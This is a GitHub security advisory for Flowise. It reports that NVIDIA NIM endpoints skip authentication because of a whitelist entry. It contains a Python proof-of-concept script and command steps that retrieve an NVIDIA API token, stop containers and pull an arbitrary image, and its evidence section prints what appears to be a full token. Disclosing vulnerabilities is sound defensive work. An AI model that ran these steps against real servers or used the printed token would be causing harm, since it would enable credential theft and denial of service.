Missing Authentication on NVIDIA NIM Endpoints

Summary

The NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.

Vulnerability Details

Field	Value
CWE	CWE-306: Missing Authentication for Critical Function
Affected File	`packages/server/src/utils/constants.ts`
Affected Line	Line 20 (`'/api/v1/nvidia-nim'` in `WHITELIST_URLS`)
CVSS 3.1	8.6 (High)

Root Cause

In packages/server/src/utils/constants.ts, the NVIDIA NIM route is added to the authentication whitelist:

export const WHITELIST_URLS = [
    // ... other URLs
    '/api/v1/nvidia-nim',  // Line 20 - bypasses JWT/API-key validation
    // ...
]

This causes the global auth middleware to skip authentication checks for all endpoints under /api/v1/nvidia-nim/*. None of the controller actions in packages/server/src/controllers/nvidia-nim/index.ts perform their own authentication checks.

Affected Endpoints

Method	Endpoint	Risk
GET	`/api/v1/nvidia-nim/get-token`	Leaks valid NVIDIA API token
GET	`/api/v1/nvidia-nim/preload`	Resource consumption
GET	`/api/v1/nvidia-nim/download-installer`	Resource consumption
GET	`/api/v1/nvidia-nim/list-running-containers`	Information disclosure
POST	`/api/v1/nvidia-nim/pull-image`	Arbitrary image pull
POST	`/api/v1/nvidia-nim/start-container`	Arbitrary container start
POST	`/api/v1/nvidia-nim/stop-container`	Denial of Service
POST	`/api/v1/nvidia-nim/get-image`	Information disclosure
POST	`/api/v1/nvidia-nim/get-container`	Information disclosure

Impact

1. NVIDIA API Token Leakage

The /get-token endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models.

Token obtained:

{
  "access_token": "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",
  "token_type": "Bearer",
  "expires_in": 3600
}

Token validation:

curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
# Returns list of 170+ available models

2. Container Runtime Manipulation

On systems with Docker/NIM installed, an unauthenticated attacker can:

List running containers (reconnaissance)
Stop containers (Denial of Service)
Start containers with arbitrary images
Pull arbitrary Docker images (resource consumption, potential malicious images)

Proof of Concept

poc.py

#!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated

Usage:
  python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""

import argparse
import urllib.request
import urllib.error

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
    ap.add_argument("--path", required=True, help="NIM endpoint path")
    ap.add_argument("--method", default="GET", choices=["GET", "POST"])
    ap.add_argument("--data", default="", help="Raw request body for POST")
    args = ap.parse_args()

    url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
    body = args.data.encode("utf-8") if args.method == "POST" else None
    req = urllib.request.Request(
        url,
        data=body,
        method=args.method,
        headers={"Content-Type": "application/json"} if body else {},
    )

    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            print(r.read().decode("utf-8", errors="replace"))
    except urllib.error.HTTPError as e:
        print(e.read().decode("utf-8", errors="replace"))

if __name__ == "__main__":
    main()

Exploitation Steps

# 1. Obtain NVIDIA API token (no authentication required)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token

# 2. List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers

# 3. Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
  --method POST --data '{"containerId":"<target_id>"}'

# 4. Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
  --method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'

Evidence

Token retrieval without authentication:

$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
{"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null}

Token grants access to NVIDIA API:

$ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
{"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]}

Container endpoints return 500 (not 401) proving auth bypass:

$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
{"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}}

References

GHSA-5f53-522j-j454

igor-magun-wd published to FlowiseAI/Flowise Mar 5, 2026

Published to the GitHub Advisory Database Mar 6, 2026

Reviewed Mar 6, 2026

Flowise Missing Authentication on NVIDIA NIM Endpoints

Package

Affected versions

Patched versions

Description

Missing Authentication on NVIDIA NIM Endpoints

Summary

Vulnerability Details

Root Cause

Affected Endpoints

Impact

1. NVIDIA API Token Leakage

2. Container Runtime Manipulation

Proof of Concept

poc.py

Exploitation Steps

Evidence

References

References

Severity

CVSS v4 base metrics

Exploitability Metrics

Vulnerable System Impact Metrics

Subsequent System Impact Metrics

EPSS score

Weaknesses

Missing Authentication for Critical Function

CVE ID

GHSA ID

Source code

Credits

Uh oh!